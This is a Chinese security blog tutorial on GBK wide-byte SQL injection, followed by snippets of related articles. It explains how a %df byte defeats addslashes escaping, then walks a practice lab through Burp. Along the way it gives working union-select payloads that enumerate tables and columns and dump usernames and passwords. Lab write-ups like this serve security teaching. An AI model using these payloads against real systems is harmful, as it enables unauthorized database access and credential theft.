【Web安全】-【SQL注入】-宽字节注入

最新推荐文章于 2022-11-18 16:44:21 发布
最新推荐文章于 2022-11-18 16:44:21 发布
阅读量4k 收藏 2
点赞数
分类专栏: Web安全 文章标签: 前端 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960003/article/details/123244744
版权

宽字节注入

宽字节注入一般由于配置Mysql连接时使用了GBK编码导致。

set character_set_client=gbk

相关知识补充

  • GBK编码:GBK全称《汉字内码扩展规范》。编码则是指以固定的顺序排列字符,并以此做为记录、存贮、传递、交换的统一内部特征。GBK编码即是和汉字字库相关的一种编码标准。GBK是采用单双字节变长编码,英文使用单字节编码,完全兼容ASCII字符编码,中文部分采用双字节编码。
  • magic_quotes_gpc:魔术引号。当php开启该项配置时,程序会对HTTP请求时传入的$_GET[]、$_POST[]、$_COOKIE[]中的参数的特殊字符进行转义,如单引号、双引号、反斜杠、NULL等符号前自动填充上\将其视为一个普通字符。

magic_quotes_gpc在php5.4版本时已经取消了,后面的版本若想进行自动转义,应采用addslashes()函数。

  • addslashes():该函数使用效果与魔术引号类似,也是将传参中的特殊字符进行转义,以免用户传参不规范导致的程序错误。

漏洞形成原因

由于服务端配置了自动转义特殊字符,因此我们在构造注入语句时会因为’或"被转义,拼接的SQL语句无法闭合,从而导致注入失败。而这时若服务端配置SQL连接时使用的是GBK编码,那么我们可以这样构造注入语句:

1%df' and 1=1 -- qwe

我们在’前增加了%df(这里不一定是%df只要是大于ascii编码128的字符即可)。按照addslashes或者magic_quotes_gpc的特性,会在’前自动填充一个\也就是%5c。而由于数据库配置的是GBK编码,这里的%df%5c两个字节便会被识别为一个汉字(第一个字节需大于ascii编码128),因此’便逃逸出来了。

靶场练习

在这里插入图片描述

  1. 判断注入点
    先直接上个and 1=1试试:
vince%df' and 1=1 -- qwe

在这里插入图片描述

发现是POST传参,%df不会被当作url编码执行,因此未产生想要的结果。这时可以通过burp来抓包进行修改参数。先随便传入一个正常的参数进行抓包。

在这里插入图片描述

右键选择’Send to Repeater’

在这里插入图片描述

修改name参数:

vince%df' or 1=1 -- qwe

修改完成后点击<Send>,之后通过’Response-Render’中查看返回页面。

在这里插入图片描述

  1. 猜解字段数
vince%df' or 1=1 order by 1 -- qwe
vince%df' or 1=1 order by 2 -- qwe
vince%df' or 1=1 order by 3 -- qwe

在这里插入图片描述

在这里插入图片描述

  1. 判断显错点
vince%df' union select 1,2 -- qwe

在这里插入图片描述

  1. 查询当前数据库名
vince%df' union select database(),2 -- qwe

在这里插入图片描述

  1. 查询表名
vince%df' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() -- qwe

在这里插入图片描述

  1. 查询字段名
vince%df' union select group_concat(distinct column_name),2 from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) -- qwe   ##筛选条件table_name若直接输入字符串,单引号会被转义,因此这里使用子查询代替

在这里插入图片描述

  1. 查询记录内容
vince%df' union select group_concat(username),group_concat(password) from users -- qwe

在这里插入图片描述

Great Leo
关注
专栏目录
WEB安全渗透测试》(7)SQL注入实战:宽字节注入
午夜安全
10-24 703
WEB安全渗透测试》(7)SQL注入实战:宽字节注入 1)宽字节注入原理如下所示,访问id=1’时并没有报错,但多了一个转义符,反斜杠。这就导致了参数id是无法逃逸单引号的包围的,所以一般情况下这里是没有SQL注入漏洞的。但是如果数据库的编码是GBK的时候,这里就可以使用宽字节注入宽字节注入的原理是:在地址后先加%df,再加单引号,因为反斜杠的编码是%5c,而GBK编码中,%df%5c是繁体字的“連”,单引号成功逃逸。使用注释符来注释后面多余的单引号。......
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4522
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
宽字节注入
weixin_45634365的博客
02-28 558
一、魔术引号 有攻击必有防御 魔术引号属于SQL注入的防御,是PHP的一种防御手段,使用反斜线将单引号、双引号以及反斜线本身进行转义 单引号和双引号内的一切都是字符串,如果我们输入的东西不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入 ' -> \' " -> \" \ -> \\ 魔术引号防护很常见,虽然魔术引号在PHP5.3.0后就被废除,5.4.0后就被移除,但是一般的CMS全部都有使用,有专门的魔术引号函数 魔术引号在低版本中默认开启,打开php.in
【转】宽字节注入详解
weixin_34198453的博客
04-08 133
前言 在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。 首先,宽字节注入与HTML页面编码是无关的,笔者曾经看到 &lt;meta charset=utf8&g...
sql注入宽字节注入学习与实践
不想当脚本小子的脚本小子
01-17 270
字节(两个字节)注入是由于mysql数据库使用了GBK编码,认为两个字符是一个汉字;注入的原理是利用编码转换,将服务器端强制添加的本来用于转移的 \ 符号吃掉而能够使得攻击者输入的引号起到闭合作用而可以进行SQL注入。 当输入 ‘ (单引号)时,被处理成\' 编码后为%5C%27再带入变成id=1\' and …… 无法注入 而当mysql在使用GBK编码时,会认为两个字符串是一个汉字(ASCII码大于128时才到汉字的范围) 输入%df'(%df加一个单引号)时,被处理成%df\' 编码后为%df
mysql字符注入
一个码农的笔记
10-14 2467
先补充一点背景: 大 家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(')会被转义成\'。比如字 符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠(\)的十六进制编码是%5C,单引号(')的十六进制编码是%27,那么就可以得出%bf \'=%bf%5c%27。如果程序的默认字符集是GBK等字节字符集,则MySQL会认为
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 889
文章目录前言一、题目描述二、解题步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 题目分类: CTF—WebSQL注入—05—MongoDB+宽字节注入 一、题目描述 题目:研究生的秘密 二、解题步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1时
Web安全--SQL注入
bobo_milk的博客
11-10 594
floor():id=1' and (select 1 from (select count(*),concat(操作代码,floor(rand(0)*2))x from information_schema.tables group by x)a) --+extractvalue():id=1' union select 1,(extractvalue(1,concat(0x7e,(select 操作代码)))) --+最快的办法就是使用工具跑,可以使用bp的intruder进行爆破字符。
Web安全SQL注入精讲视频.zip
04-16
目录网盘文件永久链接 1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站中的SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 ...3-5 宽字节注入.mp4 3-6 过滤函数绕过(综合实验).mp4 4-1SQL注入防御.mp4
SQL注入教程——(四)宽字节注入
热门推荐
hijack89的博客
07-27 2万+
前言在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。涉及到的基本概念 字符、字符集 字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(en
宽字节注入实例
七月_的博客
08-09 2115
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是宽字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
掌控安全学院SQL注入靶场
最新发布
qaq517384的博客
11-18 3797
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
宽字节注入详解
xyx107的博客
08-11 5220
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
MySQL宽字节注入漏洞分析
HelloWeb2014的博客
03-07 8166
MySQL宽字节注入漏洞分析 By HelloWeb 2017-3-7 MySQL宽字节注入漏洞是SQL注入漏洞攻防技术相互促进的一个典型例子。 1 经典SQL注入漏洞 例子1是没有任何SQL注入防护措施的PHP程序,它存在SQL注入漏洞。 <?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','roo
SQL注入基础-易错问题汇总
weixin_30606461的博客
08-02 644
SQL注入基础-易错问题汇总 1.sql注入本质是什么 把用户输入当做代码执行 2.sql注入的条件 用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行 3.order by的作用及含义 order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段...
SQL注入——布尔盲注,延时盲注,宽字节注入
weixin_46601374的博客
02-27 2543
什么是盲注? 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。 盲注函数 length() 函数 返回字符串的长度 ?id=1 and length(database())>1 substr() 截取字符串 , 从第一位截取一个 id=1 and substr(database(),1,1)='k' substr(内容,1,1) 显示第一个字符 ord()/ascii() 返回字符的ascii码 ..
宽字节注入和报错注入
ws1813004226的博客
05-25 545
宽字节注入 1.什么是字节 当某字符的大小为一个字节时,称其字符为窄字节; 当某字符的大小为两个字节时,称其字符为字节; 所有英文默认占一个字节,汉字占两个字节。 常见的字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 2.注入条件 (1)数据库使用了gbk编码. (2)使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单
SQL注入宽字节注入
qq_68233961的博客
07-24 1986
SQL注入宽字节注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值